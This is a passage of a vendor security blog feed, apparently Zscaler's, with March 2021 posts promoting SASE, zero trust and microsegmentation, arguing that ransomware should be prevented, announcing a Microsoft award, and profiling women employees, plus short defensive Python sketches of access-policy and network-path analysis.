The COVID-19 crisis exposed the extent to which legacy systems hinder enterprise ability to enable remote access. Couple that with employees spending most of their time outside the corporate network perimeter, and it is clear this new way of work requires a new security approach that can only be brought about by transformational change in how we manage and mitigate risk. We CISOs and CIOs must plan to support the new AC era immediately (and indefinitely). We need to examine architectures, tools, processes, and technologies and ensure they align with the new reality of remote employees, third parties, and customers who expect to work from anywhere. There will be more crises. The sooner we accelerate digital transformation, the better prepared we’ll be for the next agile pivot. The whole idea behind transformation is for companies to move quickly to embrace change. Beyond unforeseen crises, companies must absorb the latest technologies: 5G, new collaboration tools, more powerful endpoint computing, and mobile devices. Network and security infrastructure must be flexible enough to support their adoption. There’s a huge opportunity here to move IT from reactive mode to proactive mode: Your IT teams should not just be in the business of responding to executive mandates. They should seize the moment to create infrastructure and workflows nimble enough to pivot to, enact, and enable new business strategies. This is where I have focused many of my discussions with security teams. Security professionals, at times, can be too focused on risk avoidance when contemplating transformational change. Transformation involves a level of risk-taking, which is fundamental to business. Without it, no business value would ever be generated.

Year one AC forecast: Cloudy with a chance of productivity

The way of work has changed forever: Employees connect from anywhere and work in the cloud. But legacy perimeter-based security models can’t protect them or their work.
And the COVID-19 pandemic has laid bare legacy infrastructure’s remote-access shortcomings. In the AC era, IT leaders will face a choice: Will they preserve legacy infrastructure, force employees to use VPNs, and pretend everything’s okay? Or employ connectivity and security solutions designed to support the way their enterprise colleagues work? Hint: It’s the second option, and it’s already in motion. Enterprises have been moving applications, data, and infrastructure to the cloud for years now to make networks more responsive to business needs. Users have also been slowly migrating outside the network perimeter—COVID-19 just accelerated this process by an order of magnitude. Securely connecting users to applications, data, and infrastructure directly via the internet has gained traction using a new networking model known as Secure Access Service Edge (SASE). SASE is a network design concept that uses the internet as the access transport for applications and data, no matter where those assets sit—in the cloud or legacy data centers. SASE has proven prescient: It is well suited to crises like COVID-19. In fact, these last months have been a worldwide proof-of-concept for the SASE model. This edge-based model grants security and access based on user-to-application connections rather than on hub-and-spoke networks with castle-and-moat security. Last year, Gartner defined the SASE model in a paper that outlined the requirements and implementation of an edge-based network. SASE has become a bit of a marketing buzzword. (Indeed, some companies claim SASE compliance, even though their solutions don’t meet its guidelines.)
An ideal SASE solution should satisfy six functional criteria:

- Seamless direct access to both external (internet, SaaS) and internal (data center, IaaS, PaaS) applications
- Context-aware access that correlates user, device, application, and other characteristics to grant permission and provide granular visibility
- Flexible deployment across all users and locations, for instant and seamless expansion without complex on-premises hardware deployment or licensing delays
- Excellent user experience when accessing critical corporate applications and key collaboration tools such as Zoom or Microsoft Teams
- Comprehensive visibility for security, monitoring, and troubleshooting that provides insight into traffic patterns and enables rapid user-issue resolution
- Comprehensive security and compliance tools that mitigate cyber threats and protect applications and data

Your employees need the right tools and technology to drive enterprise growth. The objective is to establish direct, secure, and scalable access to applications and data. For CISOs and CIOs, this approach advances the triumvirate of goals they have for bringing value to the business: an attestable bend in the risk curve, a lower total cost of controls, and enablement of business velocity and user experience.

SASE prepares you for the AC era

Change won’t be easy: Successful enterprises in the new AC era will be built on agile network and security architectures. Though the world of legacy networks may already have been heading in a SASE direction, the COVID-19 crisis has blown up legacy models for good. Enabling the new work-from-anywhere workforce has necessitated a fundamental change in how we approach connectivity design and cloud usage. The cloud is the new corporate data center, and the internet is the new corporate network. Embracing that reality will future-proof your enterprise and better serve your business, your bottom line, and your users. Welcome to year one, AC.
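As a concrete illustration of the context-aware access criterion above, the sketch below makes an allow/deny decision by correlating user identity and device posture against a per-application policy. Everything here is hypothetical — the policy table, attribute names, and applications are invented for the example, not drawn from any vendor's API:

```python
from dataclasses import dataclass

@dataclass
class AccessRequest:
    user: str
    groups: set[str]       # group memberships from the identity provider
    device_managed: bool   # device posture signals from endpoint management
    disk_encrypted: bool
    app: str               # the single application being requested

# Hypothetical per-app policies: required group plus posture requirements.
POLICIES = {
    "payroll": {"group": "finance", "require_managed": True},
    "wiki":    {"group": "employees", "require_managed": False},
}

def evaluate(req: AccessRequest) -> bool:
    """Grant access to one app, never to a network segment. Default-deny."""
    policy = POLICIES.get(req.app)
    if policy is None:
        return False  # unknown app: deny
    if policy["group"] not in req.groups:
        return False  # identity check failed
    if policy["require_managed"] and not (req.device_managed and req.disk_encrypted):
        return False  # device posture check failed
    return True
```

The point of the sketch is the shape of the decision: each request is evaluated on its own context, and a passing check yields access to exactly one application, not to the network behind it.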
Thu, 25 Mar 2021 09:53:15 -0700 Brad Moldenhauer Zero Trust: The Key to Securing Business Now and in the Post-COVID World Foreword: First, to the IT security leaders who spent countless hours responding to the need to secure a new, remote workforce during the pandemic - congratulations on what I’m sure, for many of you, was one of the most challenging and significant accomplishments of your career. When Zscaler first began to hear from companies about the need to enable a mobile workforce, we anticipated two things would happen. First, many organizations would look for a quick, short-term solution to the problem and scale up their use of remote access VPN. This is borne out by Wipro’s State of Cybersecurity Report 2020, which found that more than 90 percent of organizations view increased VPN capacity as a top priority. Second, we anticipated that quickly adapting to a remote workforce would create the largest attack surface in the history of security. As VPN adoption skyrocketed, so too did the number of internet-based exploits looking to capitalize on the fact that VPNs connect users to the corporate network. In fact, the CVE database now lists almost 500 known VPN vulnerabilities that attackers actively target. Some examples of VPN-based exploits include:

- Social engineering attacks – as we saw at Twitter in 2020
- Microsoft Exchange Server exploits
- Ransomware – for example, Sodinokibi, which affected several large businesses
- Attacks on the U.S. government by nation-states (e.g., China)

Each of these exploits poses a considerable threat to a business. To combat them, companies are now looking to embrace zero trust architectures as a means of connecting users to business applications, thereby eliminating the need for VPN and avoiding placing users onto the corporate network or exposing resources to the internet.
The companies that had already begun their zero trust journey benefited greatly, as they already had the foundation technologies in place to protect their data, ensure least-privilege access, and deliver the experience their users needed when it mattered most. They simply scaled up their zero trust services.

A new cloud landscape makes zero trust critical

Business continuity in 2020 taught us that location no longer matters when it comes to employee productivity, and that the rise of a new, hybrid workforce has accelerated transformation to cloud services that can better enable business growth and competitiveness. This has opened up new avenues for cloud-delivered security technologies designed to connect users, who are now working from anywhere, to critical business applications. This is why the adoption of zero trust architectures has grown by leaps and bounds and is expected to continue: more than 80 percent of IT leaders say it’s a priority post-pandemic, per Wipro’s research. As security leaders look to embrace these architectures, they need to first understand what zero trust means and be sure to avoid the misconceptions that often surround the topic. They should note that the term “zero trust” has been around for more than 10 years. The problem was that it was always based on the notion of network connectivity—connect a user to a network where the applications lie and then segment the network with internal firewalls to minimize lateral movement. This approach was complex to manage and implied trust: remote users tunneled onto the network via VPN, and in-office employees accessed the network simply because they were already working from HQ or a branch office. That is the opposite of zero trust.
Zero trust is about beginning with the notion of trusting no one, and only establishing trust by first relying on context - the identity of the user, and the business policies defined by IT - to provide access to specific apps, never the network itself. If a user leaves the company, or the health of the device they are connecting from changes, business policies adapt to minimize risk to the business. These capabilities are key to enabling the success of the business now and in the future. It’s also important to realize that not all zero trust services are the same. Some are hosted as fully cloud-delivered services managed by the security vendor. Others are deployed as on-premises gateways hosted and managed by the customers themselves. Architecture matters more than ever.

Powering business with zero trust

The good news is that with zero trust, security leaders now have the rare ability to actually drive the secure transformation of their business, rather than get swept up in the change. Here is what I mean by that: Organizations must move to the cloud for agility and remove IT friction - The adoption of SaaS apps (O365, Salesforce, Box, etc.), collaboration apps (e.g., Microsoft Teams and Zoom), and the move to public cloud (Azure, AWS, Google, etc.) are all natural tailwinds for transformation. This also explains why more than 80 percent of businesses expect to increase their consumption of security-as-a-service technologies post-COVID-19. Cloud-delivered zero trust services will become the preferred option for businesses going forward since they offload the management of security infrastructure to the vendor and ensure scalability and availability as part of their service level agreement (some even have a five-nines SLA). These services were designed to connect users to the applications they need using brokers with points of presence all across the globe - even if the app is running on-premises or on a public cloud platform.
There are also no appliances to manage or network infrastructure to set up that would slow down the move to cloud. Businesses must ensure that access to apps is rooted in zero trust - The ability to use identity and defined business policies to connect authorized users directly to applications ensures that the business never has to place users onto its network. This means that no network resources ever need to be exposed to the internet. It also means that access to applications is always secure. This makes it easier for the business to embrace cloud, and, when combined with the ability to use device posture as a criterion for access to an application, the 70+ percent of businesses that view device security as a priority going forward will be overjoyed. Users must have the ability to work from anywhere - Because zero trust access is always based on identity and business policies, and the cloud service automatically selects the fastest access path, the physical location of the user no longer matters. The same user working in the office has the exact same access experience when working from home. This is good news for the IT security teams using zero trust services today, as the technologies they invested in for the remote world can still be used once offices begin opening back up.

Shifting zero trust from theory into practice

Knowing where to begin is always the hardest part of embracing something new. Below are some tips to consider when it comes to your zero trust implementation: Build your zero trust blueprint - Make sure to include an identity provider, access service, endpoint security solution, and SIEM solution in your plans. There is no “god” zero trust solution. Each of these is a key ecosystem player designed to integrate with the others using APIs.
Determine what your existing attack surface looks like today - Ask the zero trust vendor you are considering to run a free assessment to determine if your network environment is currently exposed to the internet. Discover any shadow IT applications running in your environment - There is a good chance that SaaS apps or private apps are being used today that you are unaware of. Make sure your security vendor has the ability to help you discover each type. Choose an initial set of users - Select a set of employees or third-party users who will benefit most from this zero trust plan. These could be C-levels, who are often important for any key decisions around IT, or partners who need access to your business applications (they often present the greatest user risk to your business). Choose an initial set of applications - Focus on the business applications that currently present the greatest risk to your organization. For many, it’s their crown-jewel private applications. Download your copy of Wipro’s State of Cybersecurity Report now. Are you Ready to Seize the Zero Trust Moment? Join us to learn how the latest Zscaler innovations will enable you to accelerate business transformation by embracing zero trust. Learn more about the event.

Thu, 25 Mar 2021 12:00:01 -0700 Christopher Hines Celebrating Women at Zscaler: Dianhuan Lin and Wendy Case In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Dianhuan Lin is a Principal Data Scientist and has been with Zscaler for two years. She prides herself on never shying away from a challenge and fully embracing opportunity when it presents itself. “In my career, I am most proud of being able to follow my passion and choose among opportunities, instead of having the opportunity choose me,” she said.
“As far as advice I have for women wanting to get into tech, I’ve found that there is always this negative voice that says, ‘this is too challenging’ or ‘this is difficult for women.’ And I always turn those negative thoughts into positive ones, translating them into, ‘that's exactly for me.’” Dianhuan believes big dreams can be achieved through small efforts when you put in the necessary work. “As Jay, the CEO of Zscaler, said, ‘it doesn’t matter whether you are a woman or a man—dream big. It is important.’ Once we take that first step or dream big, we must then work backward in terms of what we need to do, take little steps, make those marginal gains. And one day, you'll be surprised how far you have come.” Outside of work, Dianhuan enjoys hiking and painting, and during quarantine, she has picked up other creative endeavors. “I started learning how to play piano during quarantine with an online tutorial,” she said. “Although I'm not good at music, I try to get out of my comfort zone, and right now, playing music is my favorite.” Wendy Case is Director, Regional Sales for the Midwest Major Team at Zscaler and has been with the company for more than three and a half years. A true tech veteran, Wendy has been in the industry for more than 20 years, and didn’t initially know if it would be the right path. “I took a chance on technology years ago after graduating from the University of Iowa with a degree in finance and a minor in accounting and Spanish,” she said. “I'm so glad I did because tech has great opportunity. I gave it a chance and thought, if it didn't work out, I could always get out of it. But look where I am now, twenty-something years later, still here, still in technology.” Reflecting on the International Women’s Day theme for 2021, Wendy said that she wants to normalize the technology field as a viable option for all women, even if they don’t have a technological background. “I definitely encourage young women to get into technology.
When I think about the International Women’s Day theme, ‘Choose to Challenge,’ I am passionate about challenging my own daughters, as well as their friends, to think about technology as an option,” she said. “There are so many opportunities and so many things that women can take advantage of in a technology company. I think it's an underserved market and we need to keep getting the word out about that.” She also stressed the importance of advocating for yourself, staying hyper-focused on your goals, and chasing your dreams. “If I had one piece of advice to give myself from years past, it would definitely be to lean in. I wouldn't have known what that term meant 20 years ago, but I definitely know opportunities passed me by because I didn't lean in,” she said. “I didn't voice my opinion. I didn't let leadership know what I was interested in pursuing. So I'd highly encourage my younger self to do that. And I encourage all the women at Zscaler to do that—make sure that you are heard. Make sure that people know what you want to do, and they can help make your dreams come true.” For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Ashley Albiani on Staying Motivated and Effecting Change Celebrating Women at Zscaler: Nicole Martinez on Influential Women and Giving Back Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Thu, 25 Mar 2021 00:00:03 -0700 Kristi Myllenbeck Eighty-Seven Percent of Your Network Paths are Only Used by Attackers The first phase of deploying microsegmentation on a corporate network involves taking full inventory of your environment, mapping workload communication paths, and then analyzing that data to determine what needs to be allowed and which paths should be eliminated. This is typically a complicated, time-consuming process for security teams. 
(On the other hand, if you’ve used Zscaler Workload Segmentation, it’s all automated.) Regardless, at some point, you arrive at conclusions around how to build segments, hopefully with small segments of no more than five to 10 machines. What you find may surprise you; for customers that have used Zscaler to segment application workloads and identify and eliminate the attack surface, the findings have been striking: Up to 87% of allowed network paths in large segments (read: those that are not microsegmented) are completely unused for legitimate traffic. So who uses these paths? Attackers, to move laterally, whether it’s your on-premises network, cloud environments, or hybrid cloud. In attack after attack, bad actors find an initial weakness to exploit that gets them access to an organization’s network. Once they’re in, they move laterally (east-west) across the network to look for valuable data or to wreak havoc with exploits such as ransomware. Regardless of the attacker’s end game, they rely on flat networks with overly permissive policies to inflict maximum damage. Microsegmentation greatly restricts lateral movement, reducing the blast radius if (when?) an attacker gains a foothold into your network. In an ideal scenario, you’re getting rid of those 87 percent of allowed, but not used, network paths. Microsegmentation should be a foundational network security control in any well-architected data center or cloud protection strategy. So why don’t more organizations deploy microsegmentation? Because it’s difficult. Microsegmentation is often viewed as complex, costly, and difficult to deploy, typically involving an eight-to-twelve-month process (at best) that results in policies that are already out of date by the time they are rolled out. But it doesn’t need to be this difficult. 
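The path analysis described above can be made concrete with a toy sketch. The hosts and flow data below are hypothetical, invented for the example rather than taken from real telemetry; the sketch compares the directed paths a flat segment implicitly allows against the paths legitimate traffic actually uses:

```python
from itertools import permutations

# In a flat segment, policy implicitly allows every host-to-host path.
hosts = ["web-1", "web-2", "app-1", "app-2", "db-1"]
allowed = set(permutations(hosts, 2))  # 5 * 4 = 20 directed paths

# Paths actually carrying legitimate traffic (e.g., observed in flow logs).
observed = {
    ("web-1", "app-1"), ("web-2", "app-1"),
    ("app-1", "db-1"), ("app-2", "db-1"),
}

# Allowed-but-unused paths serve no business purpose: only an attacker
# moving laterally would ever exercise them.
unused = allowed - observed
print(f"{len(unused)}/{len(allowed)} allowed paths "
      f"({100 * len(unused) / len(allowed):.0f}%) carry no legitimate traffic")
```

Even in this tiny five-host example, most of the allowed paths go unused; the share only grows as segments get larger, since allowed paths scale with the square of the host count while legitimate application paths do not.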
Zscaler Workload Segmentation has been engineered to eliminate the challenges of traditional approaches to network segmentation with simple, software-defined policies:

- Simplify — Identity-based policies not only ensure that only verified software is communicating, but they get you out of the business of building static network policies based on port/protocol and IP in favor of business-level policies understandable by humans.
- Accelerate — ZWS automatically builds real-time application topology and dependency maps down to the sub-process level. It instantly highlights required application paths, making recommendations on what can safely be eliminated.
- Automate — Machine learning automates the entire policy lifecycle, automatically recommending policies, adapting, and making new recommendations when apps change or are added.

So, if attackers are able to find their way inside your perimeter, they’ll have 87 percent fewer ways to move laterally. Furthermore, the remaining 13 percent of paths are protected by Zscaler Workload Segmentation, stopping unauthorized east-west movement. A reduced attack surface means reduced risk. Done properly, microsegmentation can result in the highest ROI that your company can achieve in cybersecurity.

Tue, 23 Mar 2021 13:00:09 -0700 Rich Campagna Celebrating Women at Zscaler: Ashley Albiani on Staying Motivated and Effecting Change In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Ashley Albiani currently serves as Senior Commercial Counsel for the Legal team at Zscaler. She joined the company in November 2016, and in that time, she has not only grown in her own career, but also mentored and advised interns who have gone on to have successful careers of their own.
“I’ve watched legal interns go on to work other coveted internships, pass the bar exam, and/or accept impressive full-time positions as young attorneys,” she said. “It’s rewarding to think that their success is at least, in small part, due to the mentorship and positive experience they had while working with me and the rest of the Legal team at Zscaler. I am genuinely excited to see where each of their careers takes them next.” Q: What advice do you have for women wanting to get into tech? A: ‘Cross-train’ – Search for opportunities to learn a new skill. Offer to take on a project that doesn’t fit within anyone’s current role or look to where you can add value to other internal teams. This will not only make you a more valuable employee, but keep work from becoming dull and demonstrate that you’re motivated to excel, even outside of your comfort zone. Q: What professional advice would you give your younger self? A: Do some research before attending a conference, webinar, or other professional development event and come prepared with a few questions related to the topics. This will make it easier for you to follow along with the presentations and help you get the most value out of the event. Also, I’d tell my younger self to invest more in $ZS! Q: Based on this year’s IWD theme, “Choose to Challenge,” how will you plan to celebrate women’s achievements and forge a path for future rockstar women in tech? A: I plan to actively look for areas where there is gender inequality and encourage others not only to recognize those gaps, but discuss them. Q: If you could have lunch with anyone in history (or present-day), who would it be? A: Ruth Bader Ginsburg - The amount that she accomplished for women’s rights, among so many other things, is incredible, and I’d love to hear every detail of her life story firsthand. She also had a great sense of humor and I’d like to think, along with most women in the legal world, that we’d be best friends. 
Q: Is there anything you’d like to add about your career journey or women in tech? A: I’d encourage everyone to check in on themselves professionally at least once a quarter. Ask: ‘Am I enjoying this work? What could make my work-life better? What progress have I made toward my goals?’ This isn’t anything original, but an important reminder that you need to carve out time to think about the bigger picture in order to grow and stay happy. Outside of work, Ashley loves to snowboard, surf, hike, play board games, and go wine tasting. During quarantine, she re-watched Jurassic Park and read the book, while also picking up a couple of other rewarding hobbies. “Since quarantine, I’ve been moonlighting as a Chair Yoga instructor for my grandparents,” she said. “I’ve also been practicing the piano again. I gave it up when I was younger, so my mom is now thrilled that those lessons did not go to waste!” For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Nicole Martinez on Influential Women and Giving Back Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler Tue, 23 Mar 2021 08:00:01 -0700 Kristi Myllenbeck Why “Preparing for Ransomware” Shouldn’t Assume its Inevitability This post also appeared on LinkedIn. In a 1991 Saturday Night Live sketch, host Joe Mantegna portrayed a New York City official tasked with reducing violent crime. He offered brochures titled "So, You've Been Shot," "So, You've Been Stabbed," and "So, You've Been Doused with Gasoline and Set on Fire." The satiric message: Being the victim of crime is inevitable, but "that's the price you pay for living in the most vibrant, exciting city in the world." 
There is a school of thought in IT circles that ransomware victimization isn't just a risk, but an inevitability, and the best thing a CIO/CISO/CTO/CEO can do is prepare for recovery. At best, that’s a fatalistically-misguided assumption that reinforces enterprise commitment to flawed perimeter-based security models. At worst, it’s a cynical acceptance of defeat that invites adversarial attack: “Ransomware is coming, but that’s the price you pay for sticking with 'the way we’ve always done things.'” Preparing for ransom isn’t the same thing as preparing for ransomware. Last year, the WSJ Cybersecurity group sponsored a webinar that emphasized the ransomware-inevitability message. The session’s participants, several of whom were ransomware victims, discussed how enterprises should react to attacks. They spent little time advising how enterprises could proactively prevent ransomware attacks in the first place. One panelist recommended CIOs develop negotiation skills, and invest in Bitcoin to make ransom payoffs easier. Another speaker told of negotiating with a "friendly" hacker, a "family man" whom the moderator suggested was a "gentleman thief." (I half-expected to see a slide titled, "So, You've Been Hacked.") I can’t believe I have to say this, but it's naïve to pretend there's any sense of honor among ransomware criminals. Whatever their methods, hackers have simple, sinister, materialistic motives. They may seek to exfiltrate data. Or lock data in place. Or demand a ransom with the promise not to destroy or release data. (By the way, that "promise" isn't worth the paper it's not printed on.) Outdated infrastructure makes for an easy target. Legacy networks, legacy security architectures, and legacy thinking all increase potential ransomware attack damage. So-called “castle-and-moat” security was designed more than a half-century ago to protect pre-internet, in-place LANs. Today, it cannot effectively secure work done outside the network perimeter. 
(How do you establish a boundary around the open internet?) Worse, it's relatively easy for a hacker to breach a traditional corporate network firewall. As we pundits are fond of noting, a ransomware hacker needs to get lucky just once to break through a perimeter. A hacker’s (or, more likely, a state-sponsored criminal organization’s) "luck" often comes from an unsuspecting employee clicking on an attachment in a phishing (or spear-phishing) email. Or a guessed password. Or successfully piggy-backing on a “trusted” software deployment. Once inside the “moat,” the hacker’s malware can move "east-west" through the corporate network with relative impunity, infecting (and seizing) adjacent data, systems, or applications within the castle walls. Ransomware attacks? Bad. Hackers? Evil. Now that that’s settled… It's cheap for a hacker to launch a ransomware attack. It's expensive for an enterprise to recover from one. For hackers, ransomware is easy and lucrative. They are launching more-sophisticated attacks and developing more complex business models. Some hacking groups even offer "Ransomware-as-a-service" kits to recruit new attackers. Their attacks have also become more destructive: Some hackers double-down on monetizing criminality, demanding a ransom to "unlock" an enterprise's encrypted data, and then demanding another payment not to auction that same proprietary information off to the highest bidder on the dark web. (Oh, and then they might destroy the data anyway. Gentlemen thieves, indeed.) Want to prepare for ransomware? Adopt zero trust. If we really want to do something about ransomware threats—something more meaningful than stocking up on digital currency to facilitate payment to the next Sandworm—we must remove hackers’ incentives. How can ransomware be made less rewarding for cyber-criminals? We can't devalue proprietary assets. But we can make those assets—data, applications, systems—more difficult (if not impossible) for hackers to seize. 
Hackers attack what they can see. Most enterprises still expose IP addresses to the open internet. Each publicly-visible IP address represents a potential attack vector. In a legacy network environment, cloud apps can also introduce risk: Publishing apps to the public cloud using a traditional firewall advertises those apps to hackers, increasing an organization's attackable surface. There are two ways to disincentivize ransomware attacks: Obscure enterprise attack surface and eliminate lateral movement. Both can be achieved with the adoption of a Zero Trust Architecture (ZTA). ZTAs supplant the traditional network model, replacing it with ephemeral, direct connectivity, be it user-to-app, user-to-datacenter, or app-to-app. Security is policy-based, specific to user, proxied, and delivered inline via cloud-edge service. Nothing—and I mean nothing—is visible to the outside world. ZTA eliminates east-west travel risk: Without a traditional MPLS network to navigate, a hacker—even one who successfully breaches a single endpoint—cannot infect proximate systems. Take away navigability to other destinations and there’s no internal path for hackers to travel, no corporate lucre to plunder, and no reason to attack. We can never take threats or threat adversaries for granted. We all must prepare for ransomware. But ransomware preparation should not assume its inevitability. CXOs who stick with “the way we’ve always done things” put their organizations at unnecessary risk, and open their doors to cyberattack. We can all aim higher than a “So-you’ve-been-hacked” pamphlet. We can move from “preparing for ransomware” to preventing it...with a Zero Trust Architecture. 
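The "take away navigability" argument above can be illustrated with a toy reachability model. The hosts and allowed paths below are invented for the example; the sketch contrasts a flat network, where one breached endpoint can pivot to everything, with a zero trust posture, where brokered per-app connections leave no network paths to traverse:

```python
from collections import deque

def reachable(start: str, allowed_paths: set[tuple[str, str]]) -> set[str]:
    """Hosts an attacker could pivot to from a compromised host (BFS over allowed paths)."""
    seen, queue = {start}, deque([start])
    while queue:
        node = queue.popleft()
        for src, dst in allowed_paths:
            if src == node and dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return seen - {start}

hosts = ["laptop", "web", "app", "db", "backup"]

# Legacy flat network: every host can route to every other host.
flat = {(a, b) for a in hosts for b in hosts if a != b}

# Zero trust posture: users get brokered, per-app connections instead of
# network access; workloads keep only the app-to-app paths they need.
segmented = {("web", "app"), ("app", "db")}

print(len(reachable("laptop", flat)))       # 4: a breached laptop exposes everything
print(len(reachable("laptop", segmented)))  # 0: no network paths left to traverse
```

The same function shows the blast radius shrinking for workloads too: a breached web server in the segmented model reaches only the app and database tiers it legitimately talks to, never the backup host.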
Mon, 22 Mar 2021 10:28:07 -0700 Toph Whitmore Zscaler Recognized as a Microsoft Security 20/20 Partner Awards Finalist for Zero Trust Champion and Security ISV of the Year This week, Microsoft announced that it had chosen its Microsoft Security 20/20 Partner Awards Finalists for the year, a prestigious classification in the Microsoft partner community. I am honored to announce that Zscaler has been chosen as a finalist in two categories: Security ISV of the Year (which Zscaler won last year); and Zero Trust Champion – ISV. These nominations validate and underscore Zscaler’s approach to delivering the best and most secure digital experience for our customers. Together with Microsoft, we have secured thousands of enterprises, from major industrial companies such as GE and Siemens, to leading consumer brands including L’Oréal. In total, we have more than 3,000 joint customers that benefit from our seven deep integrations across Microsoft 365 and Azure involving key programs and technologies in support of the zero-trust journey. I would be remiss not to thank our customers for joining us in this journey. The past year has been difficult—to say the least—and our collaboration with Microsoft has shown time and time again what two innovative companies working together can create. To demonstrate this point, I’m going to share two quick stories, the themes of which you are likely familiar with, but each with an ending that speaks of triumph, innovation, and poise. Racing to get the workforce remote: Zscaler + Microsoft 365 Nearly a year ago to the day, many of us received notice that work wasn’t going to be in the office for some time due to the COVID-19 pandemic. 
Putting technical hurdles aside for a moment, a question that arose for many enterprises around the world was, “How are we going to get our work done?” With so much of the world using enterprise business and productivity apps on-prem and in the cloud to communicate, organize, write, present, calculate, exchange files, etc., there was no time to waste. People had to go home, but work couldn’t grind to a halt. IT leaders had a lot to think about. “Is my network going to hold up? Does everyone have access to the apps they need? Is my security for remote workers enough? What do I need to implement to handle growing traffic needs and new attack surfaces?” It became evident nearly overnight that the network architectures of the past had run their course. It was time to try something new, something innovative for the new work-from-home reality. Johnson Controls: 100,000+ office workers required to go remote Johnson Controls is a large, multinational corporation that specializes in the production of HVAC, fire, and security systems for buildings. When the pandemic hit and workers needed to become remote, Johnson Controls turned to Zscaler and Microsoft to alleviate the pain of legacy VPNs that had become impossible to scale and hurt the user experience. In three weeks, Johnson Controls was able to overcome VPN capacity constraints using Zscaler Private Access and Azure AD, which scaled automatically to meet user needs, while significantly improving the end-user experience and implementing a zero trust app access solution. Johnson Controls was able to transform how work was done in a matter of weeks to meet a changing world. DB Schenker: Local internet breakouts for 1,400 branch locations in 80+ countries DB Schenker is a large European-based logistics company with more than 75,000 employees in 80+ countries. 
DB Schenker looked to Zscaler to enable its move to a SASE architecture that supported cloud-based applications—including Microsoft 365—and removed IT complexity for branch locations. Together, we: Moved to Microsoft 365 cloud services in 80+ countries; Removed appliances and enabled direct-to-internet connections for 1,400 branch locations; Created 40,000 “home locations” with direct internet and SaaS access due to COVID-19 mandates; and Allowed critical, everyday collaboration via Microsoft Teams touching 75,000 employees. It’s stories like these that make our collaboration so powerful and unique. When customers need to solve the world’s most pressing IT problems, they can turn to Zscaler and Microsoft. Zero trust is not a nice-to-have, it’s fundamental to digital transformation. This is the first year that Microsoft has a Zero Trust Champion award, and we’re extremely proud to be nominated. Zscaler is committed to helping our customers accelerate digital transformation with a focus on zero trust. The Zscaler Zero Trust Exchange, the platform that powers all Zscaler services, is uniquely positioned to protect a changing, hyperconnected yet dispersed world. Business is taking place off your trusted corporate network and outside your security perimeter. Apps now live both in your data center and the cloud. Users are connecting from everywhere using a variety of devices. Server, IoT, and OT traffic is growing exponentially. The internet is the new connectivity layer. Zscaler’s Zero Trust Exchange is a cloud-native platform that securely connects users, apps, and devices over any network, in any location, using business policies to increase user productivity, reduce business risk, slash costs, and simplify IT. Together with Microsoft, we’ll continue our stewardship of digital transformation built on zero trust principles. Don’t forget to check out Microsoft Security 20/20. Again, we want to thank Microsoft for the company’s continued collaboration with Zscaler. 
Our commitment to our joint customers remains steadfast as we expand our integrations across Microsoft’s suites of products, and we stand ready to take on the toughest IT challenges the world has to offer. The second annual Microsoft Security 20/20 awards will celebrate finalists in 18 categories spanning security, compliance, and identity. Microsoft will be unveiling the winners of the Microsoft Security 20/20 Partner Awards, voted on by a group of industry veterans, on May 12, 2021. Wed, 17 Mar 2021 16:22:06 -0700 Punit Minocha Celebrating Women at Zscaler: Nicole Martinez on Influential Women and Giving Back In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Nicole Martinez joined Zscaler in 2016 and is currently Manager, Cloud Operations Platform Programs at the company. Throughout her career journey, she has seen significant technological evolution, learned important lessons about navigating tech as a woman, and dedicated herself to encouraging and empowering women in the industry. “I started my journey in technology many years ago directly out of college working in IT support,” she said. “I worked for a female executive who led her team with grace and encouraged the growth and development of all her employees.” “I've carried with me the grace and patience of that first female leader I had at the start of my career,” she said. “She taught me that even if you don't know how to do something, don't let that stop you—dive in and explore every opportunity, find your interest, and learn all you can about it. I've also learned that it's OK to be thought of as nice or ‘the quiet one.’ You don't have to be the loudest voice in the room to make the biggest impact.” “Technology is constantly changing and we should be changing with it, growing, and exploring,” she said. 
“I choose to continue to support the growth and opportunities in tech for women by always being supportive of other women and sharing what I’ve learned in my journey.” Q: What are you most proud of in your career? A: Building a team from the ground up, of which two-thirds are women. Q: What advice do you have for women wanting to get into tech? A: Do it, educate yourself, seek the knowledge, and take the leap. It's very rewarding to see the impact of your work in the world. Q: What professional advice would you give your younger self? A: It's going to be OK, say yes when opportunity presents itself. If you make a mistake, learn from it. Q: Who was your greatest inspiration when you were growing up and why? A: My mom. She was always supportive and from a very young age she told me I could do anything if I apply myself, work hard, and never give up. Q: What do you like to do outside of work? A: Help others. I sit on the board of a non-profit that provides services to Veterans and others in need. We do this by pairing them with Service Dogs taken from shelters and rescues. I am a founding member of this non-profit and we are celebrating our 10 year anniversary this year. For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Celebrating Women at Zscaler: Diana Vikutan on Developing Zscaler and Honing Multitasking Skills During Quarantine Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Thu, 18 Mar 2021 08:00:01 -0700 Kristi Myllenbeck No More Security vs. 
